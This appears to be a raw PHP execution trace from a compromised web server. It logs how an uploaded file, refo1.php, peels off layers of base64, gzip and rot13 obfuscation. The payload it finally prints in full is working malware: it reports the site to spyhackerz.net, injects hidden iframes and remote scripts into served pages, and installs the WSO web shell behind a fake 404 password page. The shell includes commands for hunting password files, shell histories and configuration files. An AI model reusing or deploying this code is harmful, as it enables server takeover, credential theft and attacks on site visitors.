3 9 0 0.000847 463248 base64_decode 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 'eJwBxkg5twHBSD63eJwBtkhJtwGxSE63eJwBpkhZtwGhSF63eJwBlkhpt+29f3fTurIw/P9d634H4927nWzSNEkLG9ompZSmpUB/t1Aob07sbTtNi2M7ianD4bu/MyPZlm3ZSYG9z13P84RFE1uj0WgkjUaj0Whzy5ga//1fS19ulbay1Oue7r4+3f2kXezt7fQuXnb3tM8bkDpMp3aPdy939nrbhx9PWboV2H5bBSRqXQVgFd+5U9+9b4+D0O9NfLvn6n3b79tWRZ3atmGtr6xYxt3Uce9980u979srlnPj14GYrYEZtgnj74HX/vNZq/ln89mfrWfP/1x79nTteWv12Z9rahVKCMYVVojSbivN6rf//q/v//1ffmj58EuBz5KLmPBPL+gHdgXz4Ht6Y/m2btgVgqkpx/u7Vy+hRvBV+2X0ycuKito93dvf3d7bPdzunp3u1mxz4EeZOOsor3/ruywnprL0TMWVb1HCd/Yl8IAe3amubgZj05n5imXf'
3 9 1 0.000946 491952
3 9 R 'x�\001�H9�\001�H>�x�\001�HI�\001�HN�x�\001�HY�\001�H^�x�\001�Hi��wӺ�0��]�~\a�ݻ�l�4I\v\033�&����@�P(oN�m;M�c;���ỿ3#ٖm�I���]��E\023[��h$�F��hs˘\032��_K_n������>��]����.^v���\033�:L�v�w/w�zۇ\037OY�\025�~[\005$j]\005`\025߹S߽o����M|���}���VE�ڶa���X���q�}�K���+�s�ׁ���\031�\t����Y��g�ٟ�g�\\{�t�yk�ٟkj\025J\b�\025V��n+�����_~h��K�ϒ���O/�\av\005��{zc��n�\025��)��W/�F�U�e��ˊ��=������=���ls�G�8�(��,\'���LŕoQ�w�%�\036ݩ�n\006cә��e߅~[���dj�+�\re\030x�t���)��B���^�l���:�FL\0315�R\030'
3 10 0 0.001336 463248 gzuncompress 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 'x�\001�H9�\001�H>�x�\001�HI�\001�HN�x�\001�HY�\001�H^�x�\001�Hi��wӺ�0��]�~\a�ݻ�l�4I\v\033�&����@�P(oN�m;M�c;���ỿ3#ٖm�I���]��E\023[��h$�F��hs˘\032��_K_n������>��]����.^v���\033�:L�v�w/w�zۇ\037OY�\025�~[\005$j]\005`\025߹S߽o����M|���}���VE�ڶa���X���q�}�K���+�s�ׁ���\031�\t����Y��g�ٟ�g�\\{�t�yk�ٟkj\025J\b�\025V��n+�����_~h��K�ϒ���O/�\av\005��{zc��n�\025��)��W/�F�U�e��ˊ��=������=���ls�G�8�(��,\'���LŕoQ�w�%�\036ݩ�n\006cә��e߅~[���dj�+�\re\030x�t���)��B���^�l���:�FL\0315�R\030'
3 10 1 0.001727 483760
3 10 R '\001�H>�x�\001�HI�\001�HN�x�\001�HY�\001�H^�x�\001�Hi��wӺ�0��]�~\a�ݻ�l�4I\v\033�&����@�P(oN�m;M�c;���ỿ3#ٖm�I���]��E\023[��h$�F��hs˘\032��_K_n������>��]����.^v���\033�:L�v�w/w�zۇ\037OY�\025�~[\005$j]\005`\025߹S߽o����M|���}���VE�ڶa���X���q�}�K���+�s�ׁ���\031�\t����Y��g�ٟ�g�\\{�t�yk�ٟkj\025J\b�\025V��n+�����_~h��K�ϒ���O/�\av\005��{zc��n�\025��)��W/�F�U�e��ˊ��=������=���ls�G�8�(��,\'���LŕoQ�w�%�\036ݩ�n\006cә��e߅~[���dj�+�\re\030x�t���)��B���^�l���:�FL\0315�R\030�M�K껃m}t'
3 11 0 0.002106 455056 gzinflate 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 '\001�H>�x�\001�HI�\001�HN�x�\001�HY�\001�H^�x�\001�Hi��wӺ�0��]�~\a�ݻ�l�4I\v\033�&����@�P(oN�m;M�c;���ỿ3#ٖm�I���]��E\023[��h$�F��hs˘\032��_K_n������>��]����.^v���\033�:L�v�w/w�zۇ\037OY�\025�~[\005$j]\005`\025߹S߽o����M|���}���VE�ڶa���X���q�}�K���+�s�ׁ���\031�\t����Y��g�ٟ�g�\\{�t�yk�ٟkj\025J\b�\025V��n+�����_~h��K�ϒ���O/�\av\005��{zc��n�\025��)��W/�F�U�e��ˊ��=������=���ls�G�8�(��,\'���LŕoQ�w�%�\036ݩ�n\006cә��e߅~[���dj�+�\re\030x�t���)��B���^�l���:�FL\0315�R\030�M�K껃m}t'
3 11 1 0.002483 475568
3 11 R 'x�\001�HI�\001�HN�x�\001�HY�\001�H^�x�\001�Hi��wӺ�0��]�~\a�ݻ�l�4I\v\033�&����@�P(oN�m;M�c;���ỿ3#ٖm�I���]��E\023[��h$�F��hs˘\032��_K_n������>��]����.^v���\033�:L�v�w/w�zۇ\037OY�\025�~[\005$j]\005`\025߹S߽o����M|���}���VE�ڶa���X���q�}�K���+�s�ׁ���\031�\t����Y��g�ٟ�g�\\{�t�yk�ٟkj\025J\b�\025V��n+�����_~h��K�ϒ���O/�\av\005��{zc��n�\025��)��W/�F�U�e��ˊ��=������=���ls�G�8�(��,\'���LŕoQ�w�%�\036ݩ�n\006cә��e߅~[���dj�+�\re\030x�t���)��B���^�l���:�FL\0315�R\030�M�K껃m}tw\030�m'
3 12 0 0.002862 455056 gzuncompress 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 'x�\001�HI�\001�HN�x�\001�HY�\001�H^�x�\001�Hi��wӺ�0��]�~\a�ݻ�l�4I\v\033�&����@�P(oN�m;M�c;���ỿ3#ٖm�I���]��E\023[��h$�F��hs˘\032��_K_n������>��]����.^v���\033�:L�v�w/w�zۇ\037OY�\025�~[\005$j]\005`\025߹S߽o����M|���}���VE�ڶa���X���q�}�K���+�s�ׁ���\031�\t����Y��g�ٟ�g�\\{�t�yk�ٟkj\025J\b�\025V��n+�����_~h��K�ϒ���O/�\av\005��{zc��n�\025��)��W/�F�U�e��ˊ��=������=���ls�G�8�(��,\'���LŕoQ�w�%�\036ݩ�n\006cә��e߅~[���dj�+�\re\030x�t���)��B���^�l���:�FL\0315�R\030�M�K껃m}tw\030�m'
3 12 1 0.003315 475568
3 12 R '\001�HN�x�\001�HY�\001�H^�x�\001�Hi��wӺ�0��]�~\a�ݻ�l�4I\v\033�&����@�P(oN�m;M�c;���ỿ3#ٖm�I���]��E\023[��h$�F��hs˘\032��_K_n������>��]����.^v���\033�:L�v�w/w�zۇ\037OY�\025�~[\005$j]\005`\025߹S߽o����M|���}���VE�ڶa���X���q�}�K���+�s�ׁ���\031�\t����Y��g�ٟ�g�\\{�t�yk�ٟkj\025J\b�\025V��n+�����_~h��K�ϒ���O/�\av\005��{zc��n�\025��)��W/�F�U�e��ˊ��=������=���ls�G�8�(��,\'���LŕoQ�w�%�\036ݩ�n\006cә��e߅~[���dj�+�\re\030x�t���)��B���^�l���:�FL\0315�R\030�M�K껃m}tw\030�m��߇�^\037'
3 13 0 0.003695 455056 gzinflate 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 '\001�HN�x�\001�HY�\001�H^�x�\001�Hi��wӺ�0��]�~\a�ݻ�l�4I\v\033�&����@�P(oN�m;M�c;���ỿ3#ٖm�I���]��E\023[��h$�F��hs˘\032��_K_n������>��]����.^v���\033�:L�v�w/w�zۇ\037OY�\025�~[\005$j]\005`\025߹S߽o����M|���}���VE�ڶa���X���q�}�K���+�s�ׁ���\031�\t����Y��g�ٟ�g�\\{�t�yk�ٟkj\025J\b�\025V��n+�����_~h��K�ϒ���O/�\av\005��{zc��n�\025��)��W/�F�U�e��ˊ��=������=���ls�G�8�(��,\'���LŕoQ�w�%�\036ݩ�n\006cә��e߅~[���dj�+�\re\030x�t���)��B���^�l���:�FL\0315�R\030�M�K껃m}tw\030�m��߇�^\037'
3 13 1 0.004078 475568
3 13 R 'x�\001�HY�\001�H^�x�\001�Hi��wӺ�0��]�~\a�ݻ�l�4I\v\033�&����@�P(oN�m;M�c;���ỿ3#ٖm�I���]��E\023[��h$�F��hs˘\032��_K_n������>��]����.^v���\033�:L�v�w/w�zۇ\037OY�\025�~[\005$j]\005`\025߹S߽o����M|���}���VE�ڶa���X���q�}�K���+�s�ׁ���\031�\t����Y��g�ٟ�g�\\{�t�yk�ٟkj\025J\b�\025V��n+�����_~h��K�ϒ���O/�\av\005��{zc��n�\025��)��W/�F�U�e��ˊ��=������=���ls�G�8�(��,\'���LŕoQ�w�%�\036ݩ�n\006cә��e߅~[���dj�+�\re\030x�t���)��B���^�l���:�FL\0315�R\030�M�K껃m}tw\030�m��߇�^\037\037���'
3 14 0 0.004462 455056 gzuncompress 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 'x�\001�HY�\001�H^�x�\001�Hi��wӺ�0��]�~\a�ݻ�l�4I\v\033�&����@�P(oN�m;M�c;���ỿ3#ٖm�I���]��E\023[��h$�F��hs˘\032��_K_n������>��]����.^v���\033�:L�v�w/w�zۇ\037OY�\025�~[\005$j]\005`\025߹S߽o����M|���}���VE�ڶa���X���q�}�K���+�s�ׁ���\031�\t����Y��g�ٟ�g�\\{�t�yk�ٟkj\025J\b�\025V��n+�����_~h��K�ϒ���O/�\av\005��{zc��n�\025��)��W/�F�U�e��ˊ��=������=���ls�G�8�(��,\'���LŕoQ�w�%�\036ݩ�n\006cә��e߅~[���dj�+�\re\030x�t���)��B���^�l���:�FL\0315�R\030�M�K껃m}tw\030�m��߇�^\037\037���'
3 14 1 0.004858 475568
3 14 R '\001�H^�x�\001�Hi��wӺ�0��]�~\a�ݻ�l�4I\v\033�&����@�P(oN�m;M�c;���ỿ3#ٖm�I���]��E\023[��h$�F��hs˘\032��_K_n������>��]����.^v���\033�:L�v�w/w�zۇ\037OY�\025�~[\005$j]\005`\025߹S߽o����M|���}���VE�ڶa���X���q�}�K���+�s�ׁ���\031�\t����Y��g�ٟ�g�\\{�t�yk�ٟkj\025J\b�\025V��n+�����_~h��K�ϒ���O/�\av\005��{zc��n�\025��)��W/�F�U�e��ˊ��=������=���ls�G�8�(��,\'���LŕoQ�w�%�\036ݩ�n\006cә��e߅~[���dj�+�\re\030x�t���)��B���^�l���:�FL\0315�R\030�M�K껃m}tw\030�m��߇�^\037\037���|�\\�6�\02'
3 15 0 0.005234 455056 gzinflate 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 '\001�H^�x�\001�Hi��wӺ�0��]�~\a�ݻ�l�4I\v\033�&����@�P(oN�m;M�c;���ỿ3#ٖm�I���]��E\023[��h$�F��hs˘\032��_K_n������>��]����.^v���\033�:L�v�w/w�zۇ\037OY�\025�~[\005$j]\005`\025߹S߽o����M|���}���VE�ڶa���X���q�}�K���+�s�ׁ���\031�\t����Y��g�ٟ�g�\\{�t�yk�ٟkj\025J\b�\025V��n+�����_~h��K�ϒ���O/�\av\005��{zc��n�\025��)��W/�F�U�e��ˊ��=������=���ls�G�8�(��,\'���LŕoQ�w�%�\036ݩ�n\006cә��e߅~[���dj�+�\re\030x�t���)��B���^�l���:�FL\0315�R\030�M�K껃m}tw\030�m��߇�^\037\037���|�\\�6�\02'
3 15 1 0.005609 475568
3 15 R 'x�\001�Hi��wӺ�0��]�~\a�ݻ�l�4I\v\033�&����@�P(oN�m;M�c;���ỿ3#ٖm�I���]��E\023[��h$�F��hs˘\032��_K_n������>��]����.^v���\033�:L�v�w/w�zۇ\037OY�\025�~[\005$j]\005`\025߹S߽o����M|���}���VE�ڶa���X���q�}�K���+�s�ׁ���\031�\t����Y��g�ٟ�g�\\{�t�yk�ٟkj\025J\b�\025V��n+�����_~h��K�ϒ���O/�\av\005��{zc��n�\025��)��W/�F�U�e��ˊ��=������=���ls�G�8�(��,\'���LŕoQ�w�%�\036ݩ�n\006cә��e߅~[���dj�+�\re\030x�t���)��B���^�l���:�FL\0315�R\030�M�K껃m}tw\030�m��߇�^\037\037���|�\\�6�\023��\025'
3 16 0 0.005986 455056 gzuncompress 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 'x�\001�Hi��wӺ�0��]�~\a�ݻ�l�4I\v\033�&����@�P(oN�m;M�c;���ỿ3#ٖm�I���]��E\023[��h$�F��hs˘\032��_K_n������>��]����.^v���\033�:L�v�w/w�zۇ\037OY�\025�~[\005$j]\005`\025߹S߽o����M|���}���VE�ڶa���X���q�}�K���+�s�ׁ���\031�\t����Y��g�ٟ�g�\\{�t�yk�ٟkj\025J\b�\025V��n+�����_~h��K�ϒ���O/�\av\005��{zc��n�\025��)��W/�F�U�e��ˊ��=������=���ls�G�8�(��,\'���LŕoQ�w�%�\036ݩ�n\006cә��e߅~[���dj�+�\re\030x�t���)��B���^�l���:�FL\0315�R\030�M�K껃m}tw\030�m��߇�^\037\037���|�\\�6�\023��\025'
3 16 1 0.006367 475568
3 16 R '�wӺ�0��]�~\a�ݻ�l�4I\v\033�&����@�P(oN�m;M�c;���ỿ3#ٖm�I���]��E\023[��h$�F��hs˘\032��_K_n������>��]����.^v���\033�:L�v�w/w�zۇ\037OY�\025�~[\005$j]\005`\025߹S߽o����M|���}���VE�ڶa���X���q�}�K���+�s�ׁ���\031�\t����Y��g�ٟ�g�\\{�t�yk�ٟkj\025J\b�\025V��n+�����_~h��K�ϒ���O/�\av\005��{zc��n�\025��)��W/�F�U�e��ˊ��=������=���ls�G�8�(��,\'���LŕoQ�w�%�\036ݩ�n\006cә��e߅~[���dj�+�\re\030x�t���)��B���^�l���:�FL\0315�R\030�M�K껃m}tw\030�m��߇�^\037\037���|�\\�6�\023��\025\016�\031u'
3 17 0 0.006745 455056 gzinflate 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 '�wӺ�0��]�~\a�ݻ�l�4I\v\033�&����@�P(oN�m;M�c;���ỿ3#ٖm�I���]��E\023[��h$�F��hs˘\032��_K_n������>��]����.^v���\033�:L�v�w/w�zۇ\037OY�\025�~[\005$j]\005`\025߹S߽o����M|���}���VE�ڶa���X���q�}�K���+�s�ׁ���\031�\t����Y��g�ٟ�g�\\{�t�yk�ٟkj\025J\b�\025V��n+�����_~h��K�ϒ���O/�\av\005��{zc��n�\025��)��W/�F�U�e��ˊ��=������=���ls�G�8�(��,\'���LŕoQ�w�%�\036ݩ�n\006cә��e߅~[���dj�+�\re\030x�t���)��B���^�l���:�FL\0315�R\030�M�K껃m}tw\030�m��߇�^\037\037���|�\\�6�\023��\025\016�\031u'
3 17 1 0.007399 532912
3 17 R '<?cuc\r\n$mk = $_FREIRE[\'UGGC_UBFG\'];\r\n$jk = $_FREIRE[\'FPEVCG_ANZR\'];\r\n$fvgr="$mk"."$jk";\r\n$purpx=svyr_trg_pbagragf("uggcf://fclunpxrem.arg/fnir.cuc?hey=$fvgr&vq=7821718728974864923874");\r\nvs($purpx == 1){\r\n}\r\nryfr{\r\n $phey=phey_vavg();\r\n phey_frgbcg($phey, PHEYBCG_HEY,"uggcf://fclunpxrem.arg/fnir.cuc?hey=$fvgr&vq=7821718728974864923874");\r\n phey_frgbcg($phey,PHEYBCG_ERGHEAGENAFSRE,gehr);\r\n $purpx=phey_rkrp($phey);\r\n\r\n vs($purpx == 1) {\r\n\r\n }\r\n ryfr{\r\'
3 18 0 0.007539 512400 str_rot13 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 '<?cuc\r\n$mk = $_FREIRE[\'UGGC_UBFG\'];\r\n$jk = $_FREIRE[\'FPEVCG_ANZR\'];\r\n$fvgr="$mk"."$jk";\r\n$purpx=svyr_trg_pbagragf("uggcf://fclunpxrem.arg/fnir.cuc?hey=$fvgr&vq=7821718728974864923874");\r\nvs($purpx == 1){\r\n}\r\nryfr{\r\n $phey=phey_vavg();\r\n phey_frgbcg($phey, PHEYBCG_HEY,"uggcf://fclunpxrem.arg/fnir.cuc?hey=$fvgr&vq=7821718728974864923874");\r\n phey_frgbcg($phey,PHEYBCG_ERGHEAGENAFSRE,gehr);\r\n $purpx=phey_rkrp($phey);\r\n\r\n vs($purpx == 1) {\r\n\r\n }\r\n ryfr{\r\'
3 18 1 0.007707 590256
3 18 R '<?php\r\n$zx = $_SERVER[\'HTTP_HOST\'];\r\n$wx = $_SERVER[\'SCRIPT_NAME\'];\r\n$site="$zx"."$wx";\r\n$check=file_get_contents("https://spyhackerz.net/save.php?url=$site&id=7821718728974864923874");\r\nif($check == 1){\r\n}\r\nelse{\r\n $curl=curl_init();\r\n curl_setopt($curl, CURLOPT_URL,"https://spyhackerz.net/save.php?url=$site&id=7821718728974864923874");\r\n curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);\r\n $check=curl_exec($curl);\r\n\r\n if($check == 1) {\r\n\r\n }\r\n else{\r\'
3 19 0 0.009921 969672 eval 1 '?><?php\r\n$zx = $_SERVER[\'HTTP_HOST\'];\r\n$wx = $_SERVER[\'SCRIPT_NAME\'];\r\n$site="$zx"."$wx";\r\n$check=file_get_contents("https://spyhackerz.net/save.php?url=$site&id=7821718728974864923874");\r\nif($check == 1){\r\n}\r\nelse{\r\n $curl=curl_init();\r\n curl_setopt($curl, CURLOPT_URL,"https://spyhackerz.net/save.php?url=$site&id=7821718728974864923874");\r\n curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);\r\n $check=curl_exec($curl);\r\n\r\n if($check == 1) {\r\n\r\n }\r\n else{\r\n echo"<iframe style=\'height: 0; width:0;\' src=\'https://spyhackerz.net/save.php?url=$site&id=7821718728974864923874\'></iframe>";\r\n }\r\n\r\n}\r\n$linr = "ZWNobyAiPFNDUklQVCBTUkM9aHR0cDovL2luam";\r\n$winr = "VjdDByLmNvbS91cGRhdGUuanM+PC9TQ1JJUFQ+Ijs=";\r\n$min = \'base\' . (128 / 2) . \'_de\' . \'code\';\r\neval($min($linr . $winr));\r\n\r\n\r\n\r\necho "<SCRIPT SRC=https://spyhackerz.net/app.js></SCRIPT>";\r\necho "<SCRIPT SRC=http://spyhackerz.net/app.js></SCRIPT>";\r\necho "<SCRIPT SRC=https://inject0r.com/update.js></SCRIPT>";\r\n\r\n\r\n/* WSO 2.1 (Web Shell by pgems.in) */ \r\n$auth_pass = "e48e13207341b6bffb7fb1622282247b"; \r\n$color = "#00ff00"; \r\n$default_action = \'FilesMan\'; \r\n@define(\'SELF_PATH\', __FILE__); \r\nif( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { \r\n header(\'HTTP/1.0 404 Not Found\'); \r\n exit; \r\n} \r\n@session_start(); \r\n@error_reporting(0); \r\n@ini_set(\'error_log\',NULL); \r\n@ini_set(\'log_errors\',0); \r\n@ini_set(\'max_execution_time\',0); \r\n@set_time_limit(0); \r\n@set_magic_quotes_runtime(0); \r\n@define(\'VERSION\', \'2.1\'); \r\nif( get_magic_quotes_gpc() ) { \r\n function stripslashes_array($array) { \r\n return is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array); \r\n } \r\n $_POST = stripslashes_array($_POST); \r\n} \r\nfunction printLogin() { \r\n ?> \r\n<h1>Not Found</h1> \r\n<p>The requested URL was not found on this server.</p> \r\n<hr> \r\n<address>Apache Server at <?=$_SERVER[\'HTTP_HOST\']?> Port 80</address> \r\n <style> \r\n input { margin:0;background-color:#fff;border:1px solid #fff; } \r\n </style> \r\n <center> \r\n <form method=post> \r\n <input type=password name=pass> \r\n </form></center> \r\n <?php \r\n exit; \r\n} \r\nif( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) \r\n if( empty( $auth_pass ) || \r\n ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) \r\n $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true; \r\n else \r\n printLogin(); \r\n\r\nif( strtolower( substr(PHP_OS,0,3) ) == "win" ) \r\n $os = \'win\'; \r\nelse \r\n $os = \'nix\'; \r\n$safe_mode = @ini_get(\'safe_mode\'); \r\n$disable_functions = @ini_get(\'disable_functions\'); \r\n$home_cwd = @getcwd(); \r\nif( isset( $_POST[\'c\'] ) ) \r\n @chdir($_POST[\'c\']); \r\n$cwd = @getcwd(); \r\nif( $os == \'win\') { \r\n $home_cwd = str_replace("\\\\", "/", $home_cwd); \r\n $cwd = str_replace("\\\\", "/", $cwd); \r\n} \r\nif( $cwd[strlen($cwd)-1] != \'/\' ) \r\n $cwd .= \'/\'; \r\n \r\nif($os == \'win\') \r\n $aliases = array( \r\n "List Directory" => "dir", \r\n "Find index.php in current dir" => "dir /s /w /b index.php", \r\n "Find *config*.php in current dir" => "dir /s /w /b *config*.php", \r\n "Show active connections" => "netstat -an", \r\n "Show running services" => "net start", \r\n "User accounts" => "net user", \r\n "Show computers" => "net view", \r\n "ARP Table" => "arp -a", \r\n "IP Configuration" => "ipconfig /all" \r\n ); \r\nelse \r\n $aliases = array( \r\n "List dir" => "ls -la", \r\n "list file attributes on a Linux second extended file system" => "lsattr -va", \r\n "show opened ports" => "netstat -an | grep -i listen", \r\n "Find" => "", \r\n "find all suid files" => "find / -type f -perm -04000 -ls", \r\n "find suid files in current dir" => "find . -type f -perm -04000 -ls",\r\n "find all sgid files" => "find / -type f -perm -02000 -ls", \r\n "find sgid files in current dir" => "find . -type f -perm -02000 -ls",\r\n "find config.inc.php files" => "find / -type f -name config.inc.php", \r\n "find config* files" => "find / -type f -name \\"config*\\"", \r\n "find config* files in current dir" => "find . -type f -name \\"config*\\"", \r\n "find all writable folders and files" => "find / -perm -2 -ls", \r\n "find all writable folders and files in current dir" => "find . -perm -2 -ls", \r\n "find all service.pwd files" => "find / -type f -name service.pwd", \r\n "find service.pwd files in current dir" => "find . -type f -name service.pwd", \r\n "find all .htpasswd files" => "find / -type f -name .htpasswd", \r\n "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", \r\n "find all .bash_history files" => "find / -type f -name .bash_history", \r\n "find .bash_history files in current dir" => "find . -type f -name .bash_history", \r\n "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", \r\n "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", \r\n "Locate" => "", \r\n "locate httpd.conf files" => "locate httpd.conf", \r\n "locate vhosts.conf files" => "locate vhosts.conf", \r\n "locate proftpd.conf files" => "locate proftpd.conf", \r\n "locate psybnc.conf files" => "locate psybnc.conf", \r\n "locate my.conf files" => "locate my.conf", \r\n "locate admin.php files" =>"locate admin.php", \r\n "locate cfg.php files" => "locate cfg.php", \r\n "locate conf.php files" => "locate conf.php", \r\n "locate config.dat files" => "locate config.dat", \r\n "locate config.php files" => "locate config.php", \r\n "locate config.inc files" => "locate config.inc", \r\n "locate config.inc.php" => "locate config.inc.php", \r\n "locate config.default.php files" => "locate config.default.php", \r\n "locate config* files " => "locate config", \r\n "locate .conf files"=>"locate \'.conf\'", \r\n "locate .pwd files" => "locate \'.pwd\'", \r\n "locate .sql files" => "locate \'.sql\'", \r\n "locate .htpasswd files" => "locate \'.htpasswd\'", \r\n "locate .bash_history files" => "locate \'.bash_history\'", \r\n "locate .mysql_history files" => "locate \'.mysql_history\'", \r\n "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", \r\n "locate backup files" => "locate backup", \r\n "locate dump files" => "locate dump", \r\n "locate priv files" => "locate priv" \r\n ); \r\n\r\nfunction printHeader() { \r\n if(empty($_POST[\'charset\'])) \r\n $_POST[\'charset\'] = "UTF-8"; \r\n global $color; \r\n ?> \r\n<html><head><meta http-equiv=\'Content-Type\' content=\'text/html; charset=<?=$_POST[\'charset\']?>\'><title><?=$_SERVER[\'HTTP_HOST\']?>- 404 Not Found Shell V.<?=VERSION?></title> \r\n<style> \r\n body {background-color:#000;color:#fff;} \r\n body,td,th { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; } \r\n span,h1,a { color:<?=$color?> !important; } \r\n span { font-weight: bolder; } \r\n h1 { border:1px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; } \r\n div.content { padding: 5px;margin-left:5px;} \r\n a { text-decoration:none; } \r\n a:hover { background:#ff0000; } \r\n .ml1 { border:1px solid #444;padding:5px;margin:0;overflow: auto; } \r\n .bigarea { width:100%;height:250px; } \r\n input, textarea, select { margin:0;color:#00ff00;background-color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; } \r\n form { margin:0px; } \r\n #toolsTbl { text-align:center; } \r\n .toolsInp { width: 80%; } \r\n .main th {text-align:left;} \r\n .main tr:hover{background-color:#5e5e5e;} \r\n .main td, th{vertical-align:middle;} \r\n pre {font-family:Courier,Monospace;} \r\n #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);} \r\n</style> \r\n<script> \r\n function set(a,c,p1,p2,p3,charset) { \r\n if(a != null)document.mf.a.value=a; \r\n if(c != null)document.mf.c.value=c; \r\n if(p1 != null)document.mf.p1.value=p1; \r\n if(p2 != null)document.mf.p2.value=p2; \r\n if(p3 != null)document.mf.p3.value=p3; \r\n if(charset != null)document.mf.charset.value=charset; \r\n } \r\n function g(a,c,p1,p2,p3,charset) { \r\n set(a,c,p1,p2,p3,charset); \r\n document.mf.submit(); \r\n } \r\n function a(a,c,p1,p2,p3,charset) { \r\n set(a,c,p1,p2,p3,charset); \r\n var params = "ajax=true"; \r\n for(i=0;i<document.mf.elements.length;i++) \r\n params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value); \r\n sr(\'<?=$_SERVER[\'REQUEST_URI\'];?>\', params); \r\n } \r\n function sr(url, params) { \r\n if (window.XMLHttpRequest) { \r\n req = new XMLHttpRequest(); \r\n req.onreadystatechange = processReqChange; \r\n req.open("POST", url, true); \r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); \r\n req.send(params); \r\n } \r\n else if (window.ActiveXObject) { \r\n req = new ActiveXObject("Microsoft.XMLHTTP"); \r\n if (req) { \r\n req.onreadystatechange = processReqChange; \r\n req.open("POST", url, true); \r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); \r\n req.send(params); \r\n } \r\n } \r\n } \r\n function processReqChange() { \r\n if( (req.readyState == 4) ) \r\n if(req.status == 200) { \r\n //alert(req.responseText); \r\n var reg = new RegExp("(\\\\d+)([\\\\S\\\\s]*)", "m"); \r\n var arr=reg.exec(req.responseText); \r\n eval(arr[2].substr(0, arr[1])); \r\n } \r\n else alert("Request error!"); \r\n } \r\n</script> \r\n<head><body><div style="position:absolute;width:100%;top:0;left:0;"> \r\n<form method=post name=mf style=\'display:none;\'> \r\n<input type=hidden name=a value=\'<?=isset($_POST[\'a\'])?$_POST[\'a\']:\'\'?>\'> \r\n<input type=hidden name=c value=\'<?=htmlspecialchars($GLOBALS[\'cwd\'])?>\'> \r\n<input type=hidden name=p1 value=\'<?=isset($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\'?>\'> \r\n<input type=hidden name=p2 value=\'<?=isset($_POST[\'p2\'])?htmlspecialchars($_POST[\'p2\']):\'\'?>\'> \r\n<input type=hidden name=p3 value=\'<?=isset($_POST[\'p3\'])?htmlspecialchars($_POST[\'p3\']):\'\'?>\'> \r\n<input type=hidden name=charset value=\'<?=isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\'?>\'> \r\n</form> \r\n<?php \r\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']); \r\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']); \r\n $totalSpace = $totalSpace?$totalSpace:1; \r\n $release = @php_uname(\'r\'); \r\n $kernel = @php_uname(\'s\'); \r\n $millink=\'http://milw0rm.com/search.php?dong=\'; \r\n if( strpos(\'Linux\', $kernel) !== false ) \r\n $millink .= urlencode( \'Linux Kernel \' . substr($release,0,6) ); \r\n else \r\n $millink .= urlencode( $kernel . \' \' . substr($release,0,3) ); \r\n if(!function_exists(\'posix_getegid\')) { \r\n $user = @get_current_user(); \r\n $uid = @getmyuid(); \r\n $gid = @getmygid(); \r\n $group = "?"; \r\n } else { \r\n $uid = @posix_getpwuid(@posix_geteuid()); \r\n $gid = @posix_getgrgid(@posix_getegid()); \r\n $user = $uid[\'name\']; \r\n $uid = $uid[\'uid\']; \r\n $group = $gid[\'name\']; \r\n $gid = $gid[\'gid\']; \r\n } \r\n $cwd_links = \'\'; \r\n $path = explode("/", $GLOBALS[\'cwd\']); \r\n $n=count($path); \r\n for($i=0;$i<$n-1;$i++) { \r\n $cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\""; \r\n for($j=0;$j<=$i;$j++) \r\n $cwd_links .= $path[$j].\'/\'; \r\n $cwd_links .= "\\")\'>".$path[$i]."/</a>"; \r\n } \r\n $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\'); \r\n $opt_charsets = \'\'; \r\n foreach($charsets as $item) \r\n $opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\'; \r\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Safe mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Bruteforce\'=>\'Bruteforce\',\'Network\'=>\'Network\'); \r\n if(!empty($GLOBALS[\'auth_pass\'])) \r\n $m[\'Logout\'] = \'Logout\'; \r\n $m[\'Self remove\'] = \'SelfRemove\'; \r\n $menu = \'\'; \r\n foreach($m as $k => $v) \r\n $menu .= \'<th width="\'.(int)(100/count($m)).\'%">[ <a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a> ]</th>\'; \r\n $drives = ""; \r\n if 